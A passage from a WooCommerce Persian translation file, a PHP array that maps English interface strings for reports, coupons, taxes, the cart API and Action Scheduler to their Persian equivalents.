of refunds.'=>'مجموعه نتایج را به انواع خاصی از بازپرداخت محدود کنید.','Limit result set to items that don\'t have the specified tax rate(s) assigned.'=>'مجموعه نتایج را به مواردی محدود کنید که نرخ(های) مالیات مشخص شده را ندارند.','Limit result set to items that have the specified tax rate(s) assigned.'=>'محدود کردن مجموعه نتایج به مواردی که دارای نرخ(های) مالیات مشخص شده هستند.','Limit result set to items that don\'t have the specified coupon(s) assigned.'=>'محدود کردن مجموعه نتایج به مواردی که کوپن(های) مشخص شده را ندارند.','Limit result set to items that have the specified coupon(s) assigned.'=>'محدود کردن مجموعه نتایج به مواردی که دارای کوپن(های) مشخص شده هستند.','Human readable segment label, either product or variation name.'=>'برچسب بخش قابل خواندن توسط انسان، نام محصول یا نام متغیر.','Product variations IDs.'=>'شناسه‌های محصولات متغیر.','Total spend.'=>'مجموع هزینه ها.','Date registered GMT.'=>'تاریخ ثبت شده منطقه زمانی گرینویچ.','Number of days to import.'=>'تعداد روزهای واردات.','Sorry, fetching downloads data failed.'=>'متاسفانه ! واکشی داده دانلود ناموفق بود.','State.'=>'استان.','Number of downloads.'=>'تعداد دانلودها.','IP'=>'IP','User Name'=>'نام کاربری','Country / Region.'=>'کشور / منطقه.','Order Number.'=>'شماره سفارش.','Order #'=>'سفارش #','Total tax.'=>'کل مالیات.','Order tax.'=>'مالیات سفارش.','Shipping tax.'=>'مالیات حمل و نقل.','Stock status.'=>'وضعیت موجودی.','Manage stock.'=>'مدیریت موجودی.','Format of the stat.'=>'قالب هزینه.','Human readable label for the stat.'=>'برچسب قابل خواندن توسط انسان برای هزینه.','Product inventory quantity.'=>'موجودی محصول.','Product inventory status.'=>'وضعیت موجودی محصول.','Product attributes.'=>'ویژگی‌های محصول.','Product link.'=>'پیوند محصول.','Priority.'=>'اولویت.','Product image.'=>'تصویر محصول.','Number of items sold.'=>'تعداد آیتم های فروخته شده.','Limit result set to items assigned a stock report type.'=>'محدود نمودن تتیجه به موارد تخصیص یافته به یک نوع گزارش موجودی.','N. Revenue'=>'درآمد','Tax code'=>'کد مالیات','User name of the downloader.'=>'نام کاربری دانلود کننده.','Order tax'=>'مالیات سفارش','Shipping tax'=>'مالیات حمل و نقل','Amount of tax codes.'=>'مبلغ کدهای مالیاتی.','Total Net sales of all items sold.'=>'مجموع فروش خالص تمام موارد فروخته شده.','User ID for the downloader.'=>'شناسه کاربری برای دانلود کننده.','Number of orders product appeared in.'=>'تعداد سفارش‌های محصول نمایش‌داده‌شده در.','Product / Variation title'=>'عنوان محصول / متغیر','IP address for the downloader.'=>'نشانی آی پی برای دانلود کننده.','Limit result set to all items that have the specified term assigned in the categories taxonomy.'=>'مجموعه نتایج محدود به همه مواردی که عبارت مشخص شده در طبقه بندی دسته بندی ها اختصاص داده شده است.','Indicates whether all the conditions should be true for the resulting set, or if any one of them is sufficient. Match affects the following parameters: products, orders, username, ip_address.'=>'نشان می دهد که آیا تمام شرایط باید برای مجموعه حاصل درست باشد یا هر یک از آنها کافی است. Match بر پارامترهای زیر تأثیر می گذارد: محصولات، سفارشات، نام کاربری، ip_address.','The date of the download, as GMT.'=>'تاریخ دانلود به عنوان GMT.','The date of the download, in the site\'s timezone.'=>'تاریخ دانلود، در منطقه زمانی سایت.','There was an issue loading the report endpoints'=>'مشکلی در بارگیری نقاط پایانی گزارش وجود داشت','Value of the stat. Returns null if the stat does not exist or cannot be loaded.'=>'ارزش آمار اگر آمار وجود نداشته باشد یا بارگذاری نشود، null برمی‌گرداند.','The specific chart this stat referrers to.'=>'نمودار خاصی که این آمار به آن اشاره دارد.','A list of stats to query must be provided.'=>'فهرستی از آمار برای پرس و جو باید ارائه شود.','Add additional piece of info about each product to the report.'=>'اطلاعات اضافی درباره هر محصول را به گزارش اضافه کنید.','Limit result to items with specified variation ids.'=>'نتایج را به مواردی با شناسه‌های تنوع مشخص محدود کنید.','Limit result to items with specified product ids.'=>'نتیجه را به مواردی با شناسه محصول مشخص شده محدود کنید.','Product inventory threshold for low stock.'=>'آستانه موجودی محصول برای موجودی کم.','Limit result set to all items that have the specified term assigned in the taxes taxonomy.'=>'محدود کردن نتیجه برای همه مواردی که دارای عبارت مشخص شده در طبقه بندی مالیات هستند.','Limit result set to items assigned one or more tax rates.'=>'محدود کردن مجموعه نتایج به مواردی که یک یا چند نرخ مالیاتی اختصاص داده شده است.','Add additional piece of info about each category to the report.'=>'اطلاعات بیشتری در مورد هر دسته به گزارش اضافه کنید.','Limit response to objects that don\'t have a specified ip address.'=>'محدود کردن پاسخ به اشیایی که آدرس آی پی مشخصی ندارند.','Limit response to objects that have a specified ip address.'=>'محدود کردن پاسخ به اشیایی که آدرس آی پی مشخصی دارند.','Limit response to objects that don\'t have the specified user ids.'=>'محدود کردن پاسخ به اشیایی که شناسه کاربری مشخص شده را ندارند.','Limit response to objects that have the specified user ids.'=>'محدود کردن پاسخ به اشیایی که دارای شناسه کاربری مشخص شده هستند.','Limit result set to items that don\'t have the specified order ids.'=>'مجموعه نتایج را به مواردی محدود کنید که شناسه سفارش مشخص شده را ندارند.','Limit result set to items that have the specified order ids.'=>'مجموعه نتایج را به مواردی که دارای شناسه های سفارش مشخص شده هستند محدود کنید.','Limit result set to items that don\'t have the specified product(s) assigned.'=>'مجموعه نتایج را به مواردی محدود کنید که محصول(های) مشخص شده را ندارند.','Limit result set to items that have the specified product(s) assigned.'=>'مجموعه نتایج را به مواردی که محصول(های) مشخص شده اختصاص داده شده محدود کنید.','Limit response to specific report stats. Allowed values: %s.'=>'محدود کردن پاسخ به آمار گزارش خاص مقادیر مجاز: %s.','Product / Variation'=>'محصول / متغیر','Number of %s products.'=>'تعداد %s محصول.','Number of low stock products.'=>'تعداد محصولات با موجودی کم.','Sorry, fetching performance indicators failed.'=>'متاسفانه ! واکشی شاخص‌های عملکرد ناموفق بود.','Sorry, fetching tax data failed.'=>'متاسفانه ! واکشی داده مالیات ناموفق بود.','Sorry, fetching revenue data failed.'=>'متاسفانه ! واکشی داده‌های درآمد ناموفق بود.','Leaderboard ID.'=>'شناسه مدیر.','Products sold.'=>'محصولات فروخته شده.','Items sold.'=>'موارد فروخته شده.','Percentage complete.'=>'درصد کامل شد.','Created'=>'ایجاد شد','Total Spend'=>'مجموع هزینه ها','Customer Name'=>'نام مشتری','Top Customers - Total Spend'=>'مشتریان برتر - مجموع هزینه','Returns'=>'برگشتی','Coupon ID.'=>'شناسه کدتخفیف.','Unique ID for the Note.'=>'شناسه یکتا برای این یادداشت.','Table cell value.'=>'مقدار سلول جدول.','Table cell display.'=>'نمایش سلول جدول.','Table rows.'=>'ردیف‌های جدول.','Table column header.'=>'سربرگ ستون جدول.','Table headers.'=>'سربرگ‌های جدول.','Displayed title for the leaderboard.'=>'نمایش عنوان راهنماها.','Taxes detailed reports.'=>'گزارش جزئیات مالیات‌ها.','Stats about taxes.'=>'آمار مالیات‌ها.','Stats about coupons.'=>'آمار کدهای تخفیف.','Coupons detailed reports.'=>'گزارش جزئیات کدتخفیف.','Stats about product categories.'=>'آمار دسته‌های محصول.','Product categories detailed reports.'=>'گزارش جزئیات دسته‌های محصول.','Stats about products.'=>'آمار محصولات.','Products detailed reports.'=>'گزارش جزئیات محصولات.','Stats about revenue.'=>'آمار درآمد.','Sorry, there is no resource with that ID.'=>'ببخشید، منبعی با این شناسه وجود ندارد.','Unique ID for the Note Action.'=>'شناسه منحصر به فرد برای فعالیت یادداشت.','Product download files detailed reports.'=>'گزارش جزئیات بارگیری پرونده‌های محصول.','Product downloads detailed reports.'=>'گزارش جزئیات بارگیری محصول.','Coupon discount type.'=>'نوع تخفیف کدتخفیف.','Coupon creation date in GMT.'=>'تاریخ ایجاد کدتخفیف بر اساس GMT.','Coupon creation date.'=>'تاریخ ایجاد کدتخفیف.','Customers detailed reports.'=>'گزارش جزئیات مشتریان.','Stats about product downloads.'=>'آمار بارگیری محصول.','Net sales'=>'فروش‌های خالص','Limit result set to items that don\'t have the specified order status.'=>'مجموعه نتایج را به آیتم هایی محدود کنید که وضعیت سفارش مشخصی نداشته باشند.','Total of taxes.'=>'جمع مالیات‌ها.','Total of returns.'=>'مجموع استردادها.','Amount discounted'=>'مبلغ با تخفیف','Items sold'=>'موارد فروخته شده','Total sales.'=>'فروش کل.','Gross sales.'=>'فروش ناخالص.','Top products - Items sold'=>'محصولات برتر - موارد فروخته‌شده','Top categories - Items sold'=>'دسته‌های برتر - موارد فروخته شده','Export download URL.'=>'برون‌بری آدرس دانلود.','Regenerate data message.'=>'پیام بازسازی داده.','The date the report end, in the site\'s timezone.'=>'تاریخ پایان گزارش، به منطقه زمانی سایت.','Net sales.'=>'فروش خالص.','Amount discounted by coupons.'=>'مبلغ تخفیف داده‌شده با کوپن.','Net Revenue'=>'درآمد خالص','Invalid response from data store.'=>'پاسخ نامعتبر از داده فروشگاه.','Type of interval.'=>'نوع فاصله.','The date the report start, in the site\'s timezone.'=>'تاریخ شروع گزارش، در منطقه زمانی سایت.','There is no data to export for the given request.'=>'هیچ داده‌ی برون‌بری برای درخواست داده شده وجود ندارد.','Your report file is being generated.'=>'پرونده گزارش شما در حال تولید است.','Sorry, there is no export with that ID.'=>'با عرض پوزش، هیچ برون‌بری با آن شناسه وجود ندارد.','Top Coupons - Number of Orders'=>'برترین کدهای تخفیف - تعداد سفارش‌ها','Stats about orders.'=>'آمار سفارش‌ها.','Number of discounted orders.'=>'تعداد سفارش‌های تخفیف‌دار.','Discounted orders'=>'سفارش‌های تخفیف‌دار','Limit results to coupons with codes matching a given string.'=>'نتایج را به کوپن هایی با کدهای مطابق با رشته معین محدود کنید.','Limit result set to items that have the specified order status.'=>'محدود کردن مجموعه نتایج به مواردی که وضعیت سفارش مشخص شده را دارند.','When true, email a link to download the export to the requesting user.'=>'وقتی درست است، پیوندی را برای دانلود صادرات به کاربر درخواست‌کننده ایمیل کنید.','Parameters to pass on to the exported report.'=>'پارامترهایی که باید به گزارش صادر شده منتقل شوند.','Segment the response by additional constraint.'=>'پاسخ را با محدودیت اضافی تقسیم کنید.','Time interval to use for buckets in the returned data.'=>'فاصله زمانی برای استفاده برای سطل ها در داده های برگشتی.','Reports data grouped by intervals.'=>'داده ها را بر اساس فواصل گروه بندی می کند.','Reports data grouped by segment condition.'=>'داده های گروه بندی شده بر اساس شرایط بخش را گزارش می دهد.','Add additional piece of info about each coupon to the report.'=>'اطلاعات بیشتری در مورد هر کوپن به گزارش اضافه کنید.','Limit result set to coupons assigned specific coupon IDs.'=>'محدود کردن نتیجه به کوپن‌هایی که شناسه‌های کوپن خاص اختصاص داده شده‌اند.','Batch endpoint for getting specific performance indicators from `stats` endpoints.'=>'نقطه پایان دسته ای برای دریافت شاخص های عملکرد خاص از نقاط پایانی «آمار».','URL query to persist across links.'=>'جستجوی URL برای تداوم در بین پیوندها.','product_includes parameter need to specify exactly one product when segmenting by variation.'=>'product_includes نیاز به پارامتر برای مشخص کردن دقیقاً یک محصول هنگام تقسیم بندی بر اساس متغیر.','Amount of items sold.'=>'مبلغ موارد فروخته شده.','Total of shipping.'=>'مجموع ارسال.','Unique coupons count.'=>'تعداد کوپن‌های منحصر به فرد.','Regeneration status.'=>'وضعیت بازسازی.','The date the report end, as GMT.'=>'تاریخ پایان گزارش، به منطقه زمانی گرینویچ.','The date the report start, as GMT.'=>'تاریخ شروع گزارش، به منطقه زمانی گرینویچ.','Totals data.'=>'کل داده‌ها.','Interval subtotals.'=>'جمع جزء بازه‌ای.','Segment identificator.'=>'شناسه بخش.','Number of coupons.'=>'تعداد کدهای تخفیف.','Net discount amount.'=>'مبلغ خالص تخفیف.','API path.'=>'مسیر API.','Coupon expiration date in GMT.'=>'تاریخ انقضاء کدتخفیف بر اساس GMT.','Coupon expiration date.'=>'تاریخ انقضاء کدتخفیف.','Welcome to the store'=>'به فروشگاه خوش آمدید','Homepage'=>'صفحه اصلی','New Products'=>'محصولات جدید','Content…'=>'محتوا…','Revenue'=>'درآمد','Your Report Download'=>'دریافت گزارش شما','Go shopping'=>'بریم خرید','On Sale'=>'حراج','Best Sellers'=>'بهترین فروشندگان','Specified file failed upload test.'=>'فایل مشخص شده تست بارگذاری نشد.','Theme installation message.'=>'پیام نصب پوسته.','Sorry, you cannot manage these options.'=>'ببخشید، شما نمیتوانید این تنظیمات را مدیریت کنید.','Shop by Category'=>'خرید بر اساس دسته','New In'=>'جدید','Search by similar tax code.'=>'جستجو بر اساس کد مالیاتی مشابه.','Uploaded theme.'=>'پوسته‌ بارگذاری شده.','A zip file of the theme to be uploaded.'=>'یک فایل فشرده از پوسته برای بارگذاری.','Sorry, you cannot view these options.'=>'ببخشید، شما نمیتوانید این گزینه‌ها را مشاهده کنید.','Search by similar product name or sku.'=>'جستجو بر اساس نام محصول مشابه یا sku.','Theme installation status.'=>'وضعیت نصب پوسته.','Fan Favorites'=>'علاقه‌مندی‌های طرفداران','Write a short welcome message here'=>'اینجا یک پیام خوش آمدگویی کوتاه بنویسید','You must supply an array of options.'=>'شما باید مجموعه‌ای از گزینه‌ها را ارائه دهید.','You must supply an array of options and values.'=>'باید آرایه‌ای از گزینه‌ها و مقادیر را ارائه دهید.','Limit result set to items that have the specified rate ID(s) assigned.'=>'محدود کردن مجموعۀ نتایج به مواردی که شناسه(های) نرخ تعیین شده را دارند.','An endpoint used for searching download logs for a specific IP address.'=>'نقطۀ پایانی که برای جستجوی گزارش‌های بارگیری برای یک آدرس IP خاص استفاده می‌شود.','Limit result set to orders matching part of an order number.'=>'محدود کردن مجموعۀ نتایج به سفارش‌هایی که با بخشی از یک شماره سفارش مطابقت دارند.','[{site_title}]: Your {report_name} Report download is ready'=>'[{site_title}]: گزارش {report_name} شما آماده بارگیری است','Array of options with associated values.'=>'آرایه ای از گزینه ها با مقادیر مرتبط.','Sorry, you are not allowed to install themes on this site.'=>'متاسفانه ! شما مجاز به نصب پوسته‌ها در این سایت نیستید.','Homepage created'=>'صفحه اصلی ایجاد شد','Write title…'=>'عنوان را بنویسید…','Sorry, the sample products data file was not found.'=>'متاسفانه ! فایل داده محصولات نمونه یافت نشد.','Sorry, you are not allowed to create new pages.'=>'متاسفانه ! شما اجازه ایجاد برگه‌های جدید را ندارید.','%s subscription expired'=>'%s اشتراک منقضی شده','%s subscription expiring soon'=>'%s اشتراک به زودی منقضی می‌شود','Get Started'=>'شروع کنید','Renew Subscription'=>'تمدید اشتراک','Enable Autorenew'=>'فعالسازی تمدید اشتراک خودکار','Your subscription expired on %s. Get a new subscription to continue receiving updates and access to support.'=>'اشتراک شما در %s منقضی شده است. برای ادامۀ دریافت بروز رسانی‌ها و دسترسی به پشتیبانی، اشتراک جدیدی دریافت کنید.','Your subscription expires in %d days. Enable autorenew to avoid losing updates and access to support.'=>'اشتراک شما %d روز دیگر منقضی می‌شود. برای جلوگیری از از دست دادن بروز رسانی‌ها و دسترسی به پشتیبانی، تمدید خودکار را فعال کنید.','Install Woo mobile app'=>'نصب نرم افزار موبایل وو','Install the WooCommerce mobile app to manage orders, receive sales notifications, and view key metrics — wherever you are.'=>'برنامۀ تلفن همراه ووکامرس را برای مدیریت سفارشات، دریافت اعلان‌های فروش و مشاهدۀ معیارهای کلیدی - هر کجا که هستید، نصب کنید.','Review your orders'=>'سفارشات خود را بازبینی کنید','Review'=>'نقد و بررسی','New sales record!'=>'رکورد فروش جدید!','Browse'=>'مرور','Congratulations on processing %s orders!'=>'برای پردازش %s سفارش تبریک می‌گوییم!','Another order milestone! Take a look at your Orders Report to review your orders to date.'=>'یک نقطه عطف سفارش دیگر! برای بررسی سفارشات تا به امروز، به گزارش سفارشات خود نگاهی بیندازید.','You\'ve hit the 10 orders milestone! Look at you go. Browse some WooCommerce success stories for inspiration.'=>'شما به نقطه عطف 10 سفارش رسیده اید! ببین تو برو برخی از داستان های موفقیت ووکامرس را برای الهام گرفتن مرور کنید.','Congratulations on getting your first order! Now is a great time to learn how to manage your orders.'=>'برای اولین سفارش خود را تبریک می گویم! اکنون زمان بسیار خوبی برای یادگیری نحوه مدیریت سفارشات است.','Woohoo, %1$s was your record day for sales! Net sales was %2$s beating the previous record of %3$s set on %4$s.'=>'واو، %1$s روز رکورد فروش شما بود! فروش خالص %2$s بود که رکورد قبلی %3$s در %4$s را شکست.','Activate usage tracking'=>'فعال‌سازی رهگیری استفاده','Gathering usage data allows us to improve WooCommerce. Your store will be considered as we evaluate new features, judge the quality of an update, or determine if an improvement makes sense. You can always visit the %1$sSettings%3$s and choose to stop sharing data. %2$sRead more%3$s about what data we collect.'=>'جمع آوری داده های استفاده به ما امکان می دهد ووکامرس را بهبود دهیم. هنگامی که ویژگی‌های جدید را ارزیابی می‌کنیم، کیفیت بروز رسانی را قضاوت می‌کنیم یا تشخیص می‌دهیم که آیا بهبود منطقی است، فروشگاه شما در نظر گرفته می‌شود. همیشه می‌توانید از %1$sتنظیمات%3$s بازدید کرده و توقف اشتراک‌گذاری داده‌ها را انتخاب کنید. %2$sاطلاعات بیشتر%3$s درباره داده‌هایی که جمع‌آوری می‌کنیم.','Report table data is being deleted.'=>'جدول دیتای گزارش حذف شد.','Actionable order statuses'=>'وضعیت‌های سفارش قابل اجرا','The admin note type prop cannot be empty.'=>'ویژگی نوع یادداشت مدیریت نمی‌تواند خالی باشد.','The admin note name prop cannot be empty.'=>'قسمت نام یادداشت مدیر نمی‌تواند خالی باشد.','The admin note title prop cannot be empty.'=>'عنوان یادداشت مدیر نمی‌تواند خالی باشد.','The admin note content prop cannot be empty.'=>'محتوای یادداشت مدیر نمی‌تواند خالی باشد.','The admin note status prop cannot be empty.'=>'وضعیت یادداشت مدیر نمی‌تواند خالی باشد.','The admin note action name prop cannot be empty.'=>'نام اقدام یادداشت مدیر نمی‌تواند خالی باشد.','The admin note date prop cannot be empty.'=>'تاریخ یادداشت مدیر نمی‌تواند خالی باشد.','The admin note locale prop cannot be empty.'=>'صفحه محلی یادداشت مدیریت نمی تواند خالی باشد.','The admin note type prop (%s) is not one of the supported types.'=>'نوع یادداشت سرپرست (%s) یکی از انواع پشتیبانی‌شده نیست.','Report table data is being rebuilt. Please allow some time for data to fully populate.'=>'داده های جدول گزارش در حال بازسازی است. لطفا کمی زمان بگذارید تا داده ها به طور کامل پر شوند.','Report sync schedulers should be derived from the Automattic\\WooCommerce\\Internal\\Admin\\Schedulers\\ImportScheduler class.'=>'زمان‌بندی‌های همگام‌سازی گزارش باید از کلاس Automattic\\WooCommerce\\Internal\\Admin\\Schedulers\\ImportScheduler مشتق شوند.','Statuses that require extra action on behalf of the store admin.'=>'وضعیت هایی که نیاز به اقدام اضافی از طرف مدیر فروشگاه دارند.','Statuses that should not be included when calculating report totals.'=>'وضعیت هایی که نباید هنگام محاسبه مجموع گزارش ها لحاظ شوند.','The admin note source prop cannot be empty.'=>'منبع یادداشت مدیریت نمی تواند خالی باشد.','The admin note action label prop cannot be empty.'=>'برچسب عملکرد یادداشت مدیریت نمی تواند خالی باشد.','The admin note status prop (%s) is not one of the supported statuses.'=>'پایگاه وضعیت یادداشت سرپرست (%s) یکی از وضعیت‌های پشتیبانی‌شده نیست.','The admin note content_data prop must be an instance of stdClass.'=>'ویژگی content_data مربوط به یادداشت مدیر باید نمونه‌ای از کلاس stdClass باشد.','An import is already in progress. Please allow the previous import to complete before beginning a new one.'=>'درون‌ریزی در حال حاضر در حال انجام است. لطفا اجازه دهید قبل از شروع یک درون‌ریزی جدید، قبلی تکمیل شود.','Default Date Range'=>'محدوده تاریخ پیشفرض','Database error.'=>'خطای پایگاه داده.','%1$s ‹ %2$s'=>'%1$s ‹ %2$s','action ignored via %s'=>'عملیات از طریق %s نادیده گرفته شد','action complete via %s'=>'عملیات توسط %s کامل شد','action started via %s'=>'عملیات توسط %s شروع شد','Excluded report order statuses'=>'وضعیت‌های مستثنی شدۀ گزارش سفارش','Settings for WooCommerce admin reporting.'=>'تنظیمات برای گزارش مدیریت ووکامرس.','Unknown status found for action.'=>'وضعیت ناشناخته برای اقدام پیدا شد.','ActionScheduler_Action::$args too long. To ensure the args column can be indexed, action args should not be more than %d characters when encoded as JSON.'=>'ActionScheduler_Action::$args خیلی طولانی است. برای اطمینان از ایندکس شدن ستون args، زمانی که به صورت JSON کدگذاری می شود، آرگ های کنش نباید بیش از %d کاراکتر باشد.','action failed via %1$s: %2$s'=>'اقدام از طریق %1$s انجام نشد: %2$s','Action [%1$s] has an invalid schedule: %2$s'=>'عملکرد [%1$s] یک برنامه زمان‌بندی نامعتبر دارد: %2$s','Activity log for the action.'=>'گزارش فعالیت برای عمل.','The next queue will begin processing in approximately %d seconds.'=>'صف بعدی تقریباً در %d ثانیه پردازش شروع می شود.','A new queue has begun processing. View actions in-progress »'=>'پردازش یک صف جدید آغاز شده است. مشاهده اقدامات در حال انجام »','There was a failure fetching this action: %s'=>'واکشی این عمل با مشکل مواجه شد: %s','There was a failure scheduling the next instance of this action: %s'=>'زمان‌بندی نمونۀ بعدی این اقدام با مشکل مواجه شد: %s','Invalid value for select or count parameter. Cannot query actions.'=>'مقدار نامعتبر برای پارامتر انتخاب یا شمارش. کنش‌ها را نمی‌توان پرس و جو کرد.','%s Support for strings longer than this will be removed in a future version.'=>'پشتیبانی از رشته‌های طولانی‌تر از این در %s در نسخه‌های بعدی حذف خواهد شد.','Stopped the insanity for %d second'=>'خرابی را برای %d ثانیه متوقف کرد','Scheduled'=>'برنامه ریزی شده','Name of the action hook that will be triggered.'=>'نام قلاب فعالیت که اجرا خواهد شد.','Scheduled Action Columns'=>'ستون‌های فعالیت زمانبندی شده','Action Scheduler is a scalable, traceable job queue for background processing large sets of actions. Action Scheduler works by triggering an action hook to run at some time in the future. Scheduled actions can also be scheduled to run on a recurring schedule.'=>'Action Scheduler یک صف کار مقیاس پذیر و قابل ردیابی برای پردازش پس زمینه مجموعه بزرگی از اقدامات است. Action Scheduler با فعال کردن یک اکشن هوک برای اجرا در زمانی در آینده کار می کند. اقدامات زمان‌بندی‌شده را نیز می‌توان برنامه‌ریزی کرد تا در یک برنامه زمانی تکرار شونده اجرا شوند.','The date/time the action is/was scheduled to run.'=>'تاریخ/زمانی که اقدام برای اجراست/برنامه ریزی شده است.','Optional data array passed to the action hook.'=>'آرایه داده اختیاری به قلاب اقدام منتقل می شود.','The action\'s schedule frequency.'=>'فرکانس زمانبندی عمل.','Optional action group.'=>'گروه اقدام اختیاری.','Action statuses are Pending, Complete, Canceled, Failed'=>'وضعیت‌های فعالیت شامل معلق، تکمیل شده، لغو شده و شکست خورده است','About'=>'درباره','About Action Scheduler %s'=>'درباره زمانبندی فعالیت %s','Unable to remove source migrated action %s'=>'امکان حذف منبع فعالیت منتقل شده %s وجود ندارد','Migrated action with ID %1$d in %2$s to ID %3$d in %4$s'=>'اقدام با شناسه %1$d در %2$s به شناسه %3$d در %4$s منتقل شد','Action Scheduler migration in progress. The list of scheduled actions may be incomplete.'=>'انتقال Action Scheduler در حال انجام است. فهرست اقدامات برنامه ریزی شده ممکن است ناقص باشد.','Migrating %d action'=>'در حال انتقال %d فعالیت','Filename'=>'نام فایل','Redirect only (Insecure)'=>'فقط تغییر مسیر (ناامن)','If you are using X-Accel-Redirect download method along with NGINX server, make sure that you have applied settings as described in Digital/Downloadable Product Handling guide.'=>'اگر از روش دانلود X-Accel-Redirect به همراه سرور NGINX استفاده می‌کنید، اطمینان حاصل کنید که تنظیمات را مطابق راهنمای شرح داده شده در تنظیم محصولات دیجیتالی/قابل دانلود اعمال کرده‌اید.','Version:'=>'نگارش:','Fees:'=>'هزینه‌ها:','MaxMind Geolocation'=>'موقعیت جغرافیایی مکس‌مایند','This data will be deleted in %s.'=>'این داده در %s پاک خواهد شد.','Unable to detect the Action Scheduler package.'=>'نتوانستیم بسته زمانبندی فعالیت را شناسایی کنیم.','Action Scheduler package running on your site.'=>'بسته زمانبندی فعالیت بر روی سایت شما در حال اجراست.','Action Scheduler package'=>'بسته زمانبندی فعالیت','Append a unique string to filename for security'=>'برای مسائل امنیتی یک رشته متنی منحصر به فرد به نام پرونده اضافه کنید','Destination store must be configured before running a migration'=>'قبل از اجرای مهاجرت، فروشگاه مقصد باید پیکربندی شود','Source logger must be configured before running a migration'=>'گزارشگر منبع باید قبل از اجرای مهاجرت پیکربندی شود','Source store must be configured before running a migration'=>'ذخیره منبع باید قبل از اجرای مهاجرت پیکربندی شود','Invalid action - must be a recurring action.'=>'اقدام نامعتبر - باید یک عمل تکرار شونده باشد.','Not required if your download directory is protected. See this guide for more details. Files already uploaded will not be affected.'=>'اگر دایرکتوری دانلود شما محافظت شده باشد، لازم نیست. برای جزئیات بیشتر این راهنما را ببینید. فایل هایی که قبلا آپلود شده اند تحت تأثیر قرار نخواهند گرفت.','Items Subtotal:'=>'موارد جمع جزء:','Destination logger must be configured before running a migration'=>'قبل از اجرای مهاجرت، خطار مقصد باید پیکربندی شود','Action Scheduler has migrated data to custom tables; however, orphaned log entries exist in the WordPress Comments table. %1$s Learn more »'=>'Action Scheduler داده ها را به جداول سفارشی منتقل کرده است. با این حال، ورودی های خطا یتیم در جدول نظرات وردپرس وجود دارد. %1$s بیشتر بیاموزید »','Choose countries / regions…'=>'کشورها/مناطق را انتخاب کنید;','Choose a country / region…'=>'کشور/منطقه‌ای را انتخاب کنید;','Update country / region'=>'بروز رسانی کشور/منطقه','Country / Region'=>'کشور / منطقه','View progress →'=>'مشاهده پیشرفت ←','Shipping Country / Region'=>'کشور/منظقه ارسال','Billing Country / Region'=>'کشور/منطقه صورتحساب','Select a country / region…'=>'کشور/منطقه را انتخاب کنید;','WooCommerce database update done'=>'بروز رسانی پایگاه داده ووکامرس انجام شد','WooCommerce database update in progress'=>'در حال بروز رسانی پایگاه داده ووکامرس','Product on sale'=>'محصول تخفیف خورده','List of categories with their product counts'=>'لیستی از دسته‌بندی‌ها با تعداد محصولات داخل هر دسته‌بندی','List of categories'=>'لیست دسته بندی ها','You are paying for a guest order. Please continue with payment only if you recognize this order.'=>'شما در حال پرداخت هزینۀ سفارش مهمان هستید. لطفا فقط در صورت شناخت این سفارش، پرداخت را ادامه دهید.','Filter products by maximum price'=>'فیلتر قیمت محصولات با بیشترین قیمت','Filter products by minimum price'=>'فیلتر قیمت محصولات با کمترین قیمت','Color'=>'رنگ','Small'=>'کوچک','Size'=>'اندازه','And'=>'و','Center'=>'وسط','Price: high to low'=>'قیمت: زیاد به کم','Price: low to high'=>'قیمت: کم به زیاد','Popularity'=>'محبوبیت','block descriptionDisplay a call to action button which either adds the product to the cart, or links to the product page.'=>'نمایش یک دکمۀ دعوت به تعامل که یا محصول را به سبد خرید اضافه می‌کند، یا به صفحۀ محصول پیوند می‌دهد.','Latest'=>'جدیدترین','Full size image URL.'=>'URL تصویر با اندازه کامل.','Thumbnail sizes for responsive images.'=>'اندازه تصاویر بندانگشتی برای تصاویر واکنش‌گرا.','Thumbnail srcset for responsive images.'=>'اندازه تصاویر بندانگشتی srcset برای تصاویر واکنش‌گرا.','Thumbnail URL.'=>'نشانی اینترنتی بندانگشتی.','Is the product on sale?'=>'آیا محصول در حراج است؟','List of cart items.'=>'لیست موارد سبد خرید.','Number of items in the cart.'=>'تعداد موارد در سبد خرید.','checkout-validationShipping %s'=>'%s حمل و نقل','Unable to retrieve cart.'=>'بازیابی سبد خرید امکان‌پذیر نیست.','Thank you for your payment. Your transaction has been completed, and a receipt for your purchase has been emailed to you. Log into your PayPal account to view transaction details.'=>'با تشکر از شما برای پرداختتان. تراکنش شما کامل شد و رسیدی برای خرید شما برایتان ایمیل شده است. برای مشاهده جزئیات تراکنش، به حساب پی‌پال خود وارد شوید.','Is the product in stock?'=>'آیا محصول موجود است؟','Is the product purchasable?'=>'آیا محصول قابل خریدن است؟','Cart item does not exist.'=>'گزینه سبد خرید وجود ندارد.','Attribute does not exist.'=>'ویژگی وجود ندارد.','This product cannot be added to the cart.'=>'این محصول را نمی توان به سبد خرید اضافه کرد.','Add to cart button parameters.'=>'افزودن به پارامترهای دکمه سبد خرید.','Xaisomboun'=>'Xaisomboun','Invalid attribute ID.'=>'شناسه ویژگی نامعتبر است.','Term description.'=>'توضیحات شرایط.','Price range, if applicable.'=>'محدوده قیمت اگر مناسب بود.','Price amount.'=>'مبلغ قیمت.','Attribute taxonomy name.'=>'نام طبقه‌بندی ویژگی.','List of attribute term IDs.'=>'لیست شناسه های شرایط متغیر.','checkout-validationBilling %s'=>'%s صورتحساب','Cannot create an existing cart item.'=>'آیتم موجود در سبد کالا را نمی‌توانید ایجاد کنید.','Stock keeping unit, if applicable.'=>'واحد نگهداری انبار، در صورت وجود.','Unique identifier for the fee within the cart.'=>'شناسه منحصربه‌فرد برای مبلغ موجود در سبد خرید.','Total weight (in grams) of all products in the cart.'=>'وزن کل (به گرم) کلیه محصولات موجود در سبد خرید.','Unique identifier for the attribute.'=>'شناسه یکتا برای ویژگی.','If this attribute has term archive pages.'=>'اگر این ویژگی دارای صفحات بایگانی طبقه‌بندی باشد.','Unique identifier for the item within the cart.'=>'شناسه یکتا برای آیتم در داخل سبد خرید.','Limit response to resources created before a given ISO8601 compliant date.'=>'محدود کردن پاسخ به منابع ایجاد شده قبل از تاریخ انطباق با ISO8601.','Filter condition being performed which may affect counts. Valid values include "and" and "or".'=>'نوع پرس و جو در حال انجام است که ممکن است بر تعداد تأثیر بگذارد. مقادیر معتبر شامل "and" و "or" است.','Invalid value posted for %1$s. Allowed values: %2$s'=>'مقدار نامعتبر برای %1$s پست شده است. مقادیر مجاز: %2$s','True if the cart needs shipping. False for carts with only digital goods or stores with no shipping methods set-up.'=>'درست است اگر سبد خرید نیاز به حمل و نقل داشته باشد. برای گاری‌هایی که فقط کالاهای دیجیتالی دارند یا فروشگاه‌هایی که روش‌های ارسال ندارند، نادرست است.','Number of objects (posts of any type) assigned to the 